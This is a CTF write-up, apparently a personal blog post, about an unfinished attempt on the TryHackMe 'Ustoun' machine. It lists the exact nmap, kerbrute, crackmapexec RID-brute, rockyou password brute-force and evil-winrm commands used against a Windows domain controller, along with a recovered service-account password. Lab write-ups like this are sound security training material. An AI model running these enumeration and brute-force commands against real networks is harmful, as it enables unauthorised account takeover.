Examining and solving Ustoun(from tryhackme.com)

First of all, I noticed this machine was broken when I am trying to solve. So I writed to the owner of room. The owner has made this room private after my notification.

Ustoun is a medium-difficult machine in TryHackMe. Let's check what we got with Nmap. In my case, ustoun’s IP is “10.10.110.63”

For a detailed nmap cheat sheet, you can use this link.

ports=$(nmap -p- --min-rate=1000 -T4 10.10.110.63 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

Setted $ports for Nmap scan detail.

nmap -p$ports -sC -sV -oA ustoun 10.10.110.63

Scanned for 10.10.110.63

Results of the scan. We can see the open ports and services.

We see the hostname( ustoun.local ) in the results. We should add this hostname to our /etc/hosts file. Because

By blocking direct IP connections you can get rid of most of the shady or even malicious traffic significantly improving corporate security.

You can check the detailed post here.

echo 10.10.110.63 dc.ustoun.local >> /etc/hosts
echo 10.10.110.63 ustoun.local >> /etc/hosts

As we see from Nmap results this is a Windows Domain Controller. I want to try and leverage Password Spraying attacks. But I need a valid list of usernames to load into my password sprayer. I will use KerBrute tool for enumerating valid Active Directory usernames. You can use this to download kerbrute tool.

sudo git clone https://github.com/ropnop/kerbrute.git

Now we need to prepare a list of users to enumerate. If you’ve already started to find usernames around the network, you can make your own user list. Otherwise, you can leverage something from the seclists usernames list with :

sudo git clone https://github.com/danielmiessler/SecLists

We have a username list now. Let’s find valid usernames with kerbrute.

./kerbrute_linux_386 usernum --dc ustoun.local -d ustoun.local /usr/share/SecLists/Usernames/xato-net-10-million-usernames-dup.txt

I have found some usernames. I will walk through the guest account. I checked crackmapexec available for a “guest” account. But it was not. So changed the account with “Guest” account and it worked.

crackmapexec smb ustoun.local -u 'Guest' -p ''

To find more valuable users and groups I used resource identifier (RID)

crackmapexec smb ustoun.local -u 'Guest' -p '' --rid-brute

I tried to brute-force to krbtgt, Guest, Administrator, and SVC-Kerb users and SVC-Kerb worked for me.

crackmapexec smb ustoun.local -u ‘SVC-Kerb’ -p /usr/share/wordlists/rockyou.txt

I made brute force with smb to null session. If winrm port is open we can log in with this pass it will makes more easy to penetrating. winrm default port is 5985.

lets’s check it.

nmap -sV -p 5985 ustoun.local

Host is up so ı tried evil-winrm.

for install evil-winrm

gem install evil-winrm

than

evil-winrm -i ustoun.local -u SVC-Kerb -p superman

But didn't work.

After that step, I made some research about that room. I recognized this room is broken!

So I did not solve it.

After some research, I recognized mssql port should be open for this room. But it is closed now. I wrote to the creator of this room. ı will solve after the fix.